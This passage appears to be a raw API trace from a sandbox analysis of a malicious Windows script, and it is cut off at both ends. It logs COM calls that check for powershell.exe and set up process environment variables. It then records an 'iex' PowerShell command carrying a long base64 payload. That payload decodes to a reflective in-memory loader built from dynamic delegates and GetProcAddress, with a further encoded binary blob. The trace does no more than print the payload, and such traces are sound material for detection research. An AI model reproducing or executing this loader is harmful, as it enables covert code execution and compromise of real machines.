This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2cd7c0) returned 0x0 [0038.635] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="f", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.635] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.635] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.635] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x18a530 | out: lpclsid=0x18a530*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0038.636] SysStringLen (param_1=0x0) returned 0x0 [0038.636] CoGetClassObject (in: rclsid=0x18a530*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3c66300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a500 | out: ppv=0x18a500*=0x2cdfb0) returned 0x0 [0038.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2cdfb0, riid=0x7fef3c66310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18a508 | out: ppvObject=0x18a508*=0x0) returned 0x80004002 [0038.640] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2cdfb0, pUnkOuter=0x0, riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a4f0 | out: ppvObject=0x18a4f0*=0x2cdfe0) returned 0x0 [0038.640] FileSystemObject:IUnknown:Release (This=0x2cdfb0) returned 0x0 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c66320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18a4d0 | out: ppvObject=0x18a4d0*=0x0) returned 0x80004002 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a4a8 | out: ppvObject=0x18a4a8*=0x0) returned 0x80004002 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a420 | out: ppvObject=0x18a420*=0x0) returned 0x80004002 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a428 | out: ppvObject=0x18a428*=0x0) returned 0x80004002 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c66508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a430 | out: ppvObject=0x18a430*=0x0) returned 0x80004002 [0038.640] IUnknown:QueryInterface (in: This=0x2cdfe0, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a438 | out: ppvObject=0x18a438*=0x2cdfe0) returned 0x0 [0038.640] IUnknown:Release (This=0x2cdfe0) returned 0x1 [0038.641] IDispatch:GetIDsOfNames (in: This=0x2cdfe0, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a7d0*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0x18a680 | out: rgDispId=0x18a680*=10016) returned 0x0 [0038.641] IUnknown:AddRef (This=0x2cdfe0) returned 0x2 [0038.641] IDispatch:Invoke (in: This=0x2cdfe0, dispIdMember=10016, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", varVal2=0x2cc418)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8, pExcepInfo=0x18a510, puArgErr=0x18a504 | out: pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", varVal2=0x2cc418)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8*(varType=0xb, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x2cd860), pExcepInfo=0x18a510*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a504*=0x0) returned 0x0 [0038.642] IUnknown:Release (This=0x2cdfe0) returned 0x1 [0038.642] IDispatch:GetIDsOfNames (in: This=0x2cd890, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a7d0*="Environment", cNames=0x1, lcid=0x409, rgDispId=0x18a680 | out: rgDispId=0x18a680*=200) returned 0x0 [0038.642] IUnknown:AddRef (This=0x2cd890) returned 0x2 [0038.642] IDispatch:Invoke (in: This=0x2cd890, dispIdMember=200, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Process", varVal2=0x2cd940)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8, pExcepInfo=0x18a510, puArgErr=0x18a504 | out: pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Process", varVal2=0x2cd940)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8*(varType=0x9, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x2cdf80, varVal2=0x2cd860), pExcepInfo=0x18a510*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a504*=0x0) returned 0x0 [0038.643] IUnknown:Release (This=0x2cd890) returned 0x1 [0038.643] IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a498 | out: ppvObject=0x18a498*=0x0) returned 0x80004002 [0038.643] IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a410 | out: ppvObject=0x18a410*=0x0) returned 0x80004002 [0038.643] IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a418 | out: ppvObject=0x18a418*=0x0) returned 0x80004002 [0038.643] IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c66508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a420 | out: ppvObject=0x18a420*=0x0) returned 0x80004002 [0038.643] IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a428 | out: ppvObject=0x18a428*=0x2cdf80) returned 0x0 [0038.643] IUnknown:Release (This=0x2cdf80) returned 0x1 [0038.643] IUnknown:AddRef (This=0x2cdf80) returned 0x2 [0038.643] IDispatch:Invoke (in: This=0x2cdf80, dispIdMember=0, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x18a6b8*(rgvarg=([0]=0x18a6d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr", varVal2=0x2cd940), [1]=0x18a6e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="a", varVal2=0x2cd940)), rgdispidNamedArgs=([0]=0x18a6b0*=-3), cArgs=0x2, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x18a660, puArgErr=0x18a654 | out: pDispParams=0x18a6b8*(rgvarg=([0]=0x18a6d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8